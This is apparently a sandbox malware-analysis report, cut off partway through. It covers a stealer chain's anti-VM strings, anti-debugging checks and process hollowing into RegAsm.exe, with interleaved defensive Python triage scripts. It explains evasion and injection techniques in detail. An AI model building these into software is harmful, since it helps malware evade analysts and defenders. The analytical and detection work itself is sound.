Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT
Source: b74664dd7e.exe, 0000001D.00000002.2792862379.0000000001297000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWE
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: file.exe, 00000006.00000002.1318517366.0000000000F98000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000008.00000002.1352700970.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp, 3ec4738210.exe, 0000000D.00000002.1975346461.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 0000000E.00000002.2584529637.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 00000013.00000002.2671660081.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, 3ec4738210.exe, 0000001A.00000002.2281536186.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001B.00000002.3753803094.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 0000001C.00000002.1990355028.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
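The virtualisation strings listed above come from three very different kinds of source and do not carry equal weight. `Amcache.hve.21.dr` is the analysis machine's own application-compatibility hive, so its VMware disk, VMCI bus and SMBIOS entries describe the sandbox hardware and say nothing about what the sample does. The RegAsm.exe heap strings glue saved-login site names to `VMware20,1`, which is the SMBIOS SystemProduct value shown in the Amcache line, i.e. the shape of a stealer's harvested record rather than a check. `Hyper-V RAW` is the name of a Winsock catalog provider and appears next to `mswsock.dll` above. Only `HARDWARE\ACPI\DSDT\VBOX__`, found in an executable image region of 3ec4738210.exe and its siblings alongside the `Oreans.vxd` / `Software\WinLicense` strings, is a check the sample carries with it, and that placement points at the Oreans (Themida/WinLicense) protector layer rather than the payload. The Python triage script below is an added example (not part of the Joe Sandbox report and not code from the sample) that applies this distinction to a constructed subset of the lines above; its reading of the memory-dump name fields (protection, then region type as `MEM_IMAGE` / `MEM_PRIVATE`) is an assumption from how the names look, and the sample lines are copied from this report.

```python
import re

# Win32 memory-type constants; treating the seventh dump-name field as the region type is an assumption.
MEM_IMAGE = 0x1000000
MEM_PRIVATE = 0x20000

VENDOR_MARKERS = {
    "vmware": ("vmware", "vmci", "necvmwar", "vmw20"),
    "virtualbox": ("vbox", "virtualbox"),
    "hyper-v": ("hyper-v", "vmbus"),
    "qemu": ("qemu", "bochs"),
}

LINE_RE = re.compile(r"^Source: (?P<src>.+?) Binary or memory string: (?P<s>.*)$")
# <proc>, <procidx>.<snapshot>.<id>.<base>.<protect>.<?>.<type>.<?>.sdmp   (assumed layout)
SDMP_RE = re.compile(
    r"(?P<proc>[^,]+), [0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\."
    r"(?P<prot>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp"
)

# Constructed subset of this report's evidence lines (copied from the listing above).
EVIDENCE = r"""
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.21.dr Binary or memory string: vmci.sys
Source: 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware*
Source: skotes.exe, 0000000B.00000002.3769918015.000000000148B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
"""


def assess(line):
    """Classify one 'Binary or memory string' line; returns None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, s = m["src"], m["s"]
    low = s.lower()
    vendor = next((v for v, marks in VENDOR_MARKERS.items() if any(k in low for k in marks)), None)
    rec = {"string": s, "vendor": vendor}
    if src.endswith(".dr"):                      # copied host file such as Amcache.hve
        rec.update(kind="host-file", process=None, weight="none",
                   verdict="analysis-VM inventory, says nothing about the sample")
        return rec
    d = SDMP_RE.search(src)
    if d is None:                                # bare binary name: string sits in the file on disk
        rec.update(kind="static", process=src.split(",")[0].strip(), weight="strong",
                   verdict="vendor string carried in the sample's file")
        return rec
    region_type = int(d["type"], 16)
    rec.update(kind="memory", process=d["proc"].strip(),
               base=int(d["base"], 16), protect=int(d["prot"], 16))
    if s.startswith("Hyper-V RAW"):
        rec.update(weight="benign", verdict="Winsock catalog provider name (loaded with mswsock.dll)")
    elif region_type == MEM_IMAGE:
        rec.update(weight="strong", verdict="string inside the sample's mapped image: anti-VM check candidate")
    elif region_type == MEM_PRIVATE and "vmware20,1" in low:
        rec.update(weight="benign", verdict="SMBIOS SystemProduct of the sandbox embedded in harvested data")
    else:
        rec.update(weight="weak", verdict="runtime data in private memory, needs context")
    return rec


def triage(text):
    """All classified records, in listing order."""
    return [r for r in (assess(l) for l in text.splitlines()) if r]


def strong_candidates(text):
    """Processes whose own image or file carries a VM vendor string."""
    return {r["process"] for r in triage(text) if r["weight"] == "strong"}


if __name__ == "__main__":
    for r in triage(EVIDENCE):
        print(f"{r['kind']:9} {r['weight']:6} {r['vendor'] or '-':10} {r['verdict']}")
    print("anti-VM check candidates:", sorted(strong_candidates(EVIDENCE)))
```

Run over the full report, the same filter collapses the long list above to a handful of processes worth opening in a disassembler; everything attributed to `Amcache.hve.21.dr` and every `Hyper-V RAW` hit can be discarded before anyone reads it.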

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000015002\b74664dd7e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04B20892 rdtsc 6_2_04B20892
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6EAA2 BlockInput, 17_2_00E6EAA2
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E22622
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DE652B mov eax, dword ptr fs:[00000030h] 11_2_00DE652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DEA302 mov eax, dword ptr fs:[00000030h] 11_2_00DEA302
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E14CE8 mov eax, dword ptr fs:[00000030h] 17_2_00E14CE8
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 17_2_00E50B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E22622
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E1083F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E109D5 SetUnhandledExceptionFilter, 17_2_00E109D5
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00E10C21
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Memory protected: page guard Jump to behavior
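The anti-debugging entries above map onto a small set of well-known primitives: `Thread information set: HideFromDebugger` is `NtSetInformationThread(ThreadHideFromDebugger)`, which stops a debugger receiving events for that thread; `Process queried: DebugPort` is `NtQueryInformationProcess(ProcessDebugPort)`, which returns non-zero when a debugger is attached; the window class and title probes (`ollydbg`, `gbdyllo`, `procmon_window_class`, `regmonclass`, `filemonclass`, the Sysinternals titles) are `FindWindow` lookups for analysis tools; the `NTICE` / `SICE` / `SIWVID` opens are the legacy SoftICE device-name check; `rdtsc` is a timing check; and `mov eax, fs:[30h]` reads the PEB, where `BeingDebugged` and `NtGlobalFlag` live. Two entries deserve a caveat. The `IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter` and `SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess` chains in 6dbb7bdf47.exe are consistent with the MSVC runtime's fail-fast and security-failure handlers, which every statically linked MSVC binary contains, so they are not evidence of intent; and `Process token adjusted: Debug` is `SeDebugPrivilege` being enabled, a prerequisite for opening other processes rather than a debugger check. The script below is an added example (not from the report or the sample) that encodes those mappings and confidence levels and ranks the processes over a constructed subset of the lines above, copied from this report; the weights are an assumption chosen for illustration.

```python
import re

TOOL_WINDOWS = {
    "ollydbg": "OllyDbg", "gbdyllo": "OllyDbg",
    "procmon_window_class": "Process Monitor",
    "regmonclass": "RegMon", "filemonclass": "FileMon",
}
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}
CRT_FASTFAIL = {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}
WEIGHT = {"high": 3, "medium": 2, "low": 1, "ignore": 0}   # assumed scoring for illustration

SRC_RE = re.compile(r"^Source: (?P<src>\S+) (?P<ev>.+?)(?: Jump to behavior)?$")

# Constructed subset of this report's "Anti Debugging" lines (copied from the listing above).
EVIDENCE = r"""
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04B20892 rdtsc 6_2_04B20892
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DE652B mov eax, dword ptr fs:[00000030h] 11_2_00DE652B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E1083F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
"""


def classify(line):
    """Map one report line to (process, technique, confidence); None if it is not an anti-debug indicator."""
    m = SRC_RE.match(line)
    if not m:
        return None
    proc, ev = m["src"].rsplit("\\", 1)[-1], m["ev"]
    if ev == "Thread information set: HideFromDebugger":
        return proc, "NtSetInformationThread(ThreadHideFromDebugger)", "high"
    if ev == "Process queried: DebugPort":
        return proc, "NtQueryInformationProcess(ProcessDebugPort)", "high"
    if ev.startswith("Open window title or class name: "):
        name = ev.split(": ", 1)[1]
        tool = next((t for k, t in TOOL_WINDOWS.items() if k in name), None)
        tool = tool or ("Sysinternals monitor" if "sysinternals" in name else name)
        return proc, f"FindWindow probe for {tool}", "high"
    if ev.startswith("File opened: "):
        dev = ev.split(": ", 1)[1]
        if dev in SOFTICE_DEVICES:
            return proc, "SoftICE device probe (CreateFile on \\\\.\\" + dev + ")", "medium"
        return None
    if ev == "Process token adjusted: Debug":
        return proc, "SeDebugPrivilege enabled (cross-process access prerequisite, not a check)", "low"
    if ev == "Memory protected: page guard":
        return proc, "PAGE_GUARD region (anti-stepping / breakpoint trap candidate)", "low"
    if ev.startswith("Debugger detection routine: "):
        return proc, "sandbox-flagged routine: " + ev.split(": ", 1)[1], "medium"
    if ev.startswith("Code function: "):
        fid, rest = ev.split(": ", 1)[1].split(" ", 1)
        if rest.endswith(fid):                   # the listing repeats the function id at the end
            rest = rest[: -len(fid)].strip()
        apis = {a for a in rest.split(",") if a}
        if "rdtsc" in rest:
            return proc, "rdtsc timing check", "medium"
        if "fs:[00000030h]" in rest:
            return proc, "PEB read via fs:[30h] (BeingDebugged / NtGlobalFlag candidate)", "low"
        if CRT_FASTFAIL <= apis:                 # MSVC runtime fail-fast handler, present in every MSVC binary
            return proc, "IsDebuggerPresent inside CRT fail-fast handler (runtime boilerplate)", "ignore"
        if "IsDebuggerPresent" in apis:
            return proc, "IsDebuggerPresent", "medium"
        if "BlockInput" in apis:
            return proc, "BlockInput (locks keyboard/mouse while running)", "low"
    return None


def summarize(text):
    """process -> technique -> (count, confidence)."""
    out = {}
    for line in text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        proc, tech, conf = hit
        count = out.setdefault(proc, {}).get(tech, (0, conf))[0]
        out[proc][tech] = (count + 1, conf)
    return out


def rank(text):
    """Processes by summed weight of their distinct techniques; repeats of one technique do not add."""
    scored = [(p, sum(WEIGHT[c] for _, c in t.values())) for p, t in summarize(text).items()]
    return sorted(scored, key=lambda pc: (-pc[1], pc[0]))


if __name__ == "__main__":
    for proc, score in rank(EVIDENCE):
        print(f"{score:3}  {proc}")
        for tech, (n, conf) in summarize(EVIDENCE)[proc].items():
            print(f"      [{conf:6}] x{n}  {tech}")
```

Counting distinct techniques rather than raw lines matters here: the report lists `Process queried: DebugPort` dozens of times because the check runs in a loop, which says nothing more than a single hit does, whereas axplong.exe combining thread hiding, a debug-port query, SoftICE device opens and window probes is a different level of effort.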

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C9008
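The gold.exe entries above are the shape of a RunPE / process-hollowing sequence against the 32-bit `RegAsm.exe` from `Framework\v4.0.30319` (a signed Microsoft utility that is a frequent host for this kind of loader): an execute-read-write allocation at `0x400000`, the default image base of a 32-bit PE; a write at that base whose first bytes are `4D5A` (`MZ`), i.e. the injected PE's headers; page-aligned writes at `0x402000`, `0x432000` and `0x450000`, consistent with the sections being copied in one by one; and a final write at `0x11C9008`, an address eight bytes into a page, which is the offset of `ImageBaseAddress` in the x86 `_PEB` and therefore consistent with the loader pointing the target's PEB at the new image before resuming it. That the allocation succeeded at `0x400000` means the address was free in the target, either through ASLR relocating the original image or through an unmap step this listing does not show; the PEB reading is an inference from the offset, not something the report states. The Python script below is an added example (not from the report or the sample) that rebuilds this write map from a constructed subset of the lines above and scores the stages; the section-write and PEB heuristics are assumptions about how such events look.

```python
import re
from collections import defaultdict

ALLOC_RE = re.compile(
    r"^Source: (?P<inj>\S+) Memory allocated: (?P<tgt>\S+) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
WRITE_RE = re.compile(
    r"^Source: (?P<inj>\S+) Memory written: (?P<tgt>\S+) base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")

# Offset of ImageBaseAddress in the 32-bit _PEB; RegAsm.exe here is the Framework (x86) build.
PEB_IMAGEBASE_OFFSET = 0x08

# Constructed subset of this report's injection lines (copied from the listing above).
EVENTS = r"""
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C9008
"""


def _name(path):
    return path.rsplit("\\", 1)[-1]


def reconstruct(text):
    """Group allocation/write events per (injector, target), label each write and score the stages."""
    sessions = defaultdict(lambda: {"allocs": [], "writes": []})
    for line in text.splitlines():
        if (m := ALLOC_RE.match(line)):
            key = (_name(m["inj"]), _name(m["tgt"]))
            sessions[key]["allocs"].append((int(m["base"], 16), m["prot"]))
        elif (m := WRITE_RE.match(line)):
            key = (_name(m["inj"]), _name(m["tgt"]))
            sessions[key]["writes"].append((int(m["base"], 16), m["magic"]))

    report = {}
    for key, s in sessions.items():
        rwx = [b for b, p in s["allocs"] if "execute" in p and "write" in p]
        labeled = []
        for addr, magic in s["writes"]:
            if addr in rwx and magic and magic.upper().startswith("4D5A"):
                label = "PE header (MZ) at the allocated image base"
            elif addr in rwx:
                label = "write at image base (no magic recorded)"
            elif (addr & 0xFFF) == 0 and any(b < addr for b in rwx):
                label = "section data (page-aligned, above image base)"      # heuristic
            elif (addr & 0xFFF) == PEB_IMAGEBASE_OFFSET:
                label = "page+0x8 write: consistent with patching PEB.ImageBaseAddress (assumption)"
            else:
                label = "unclassified write"
            labeled.append((addr, label))
        stages = {
            "rwx_alloc_at_image_base": bool(rwx),
            "mz_header_written": any(l.startswith("PE header") for _, l in labeled),
            "section_writes": any(l.startswith("section data") for _, l in labeled),
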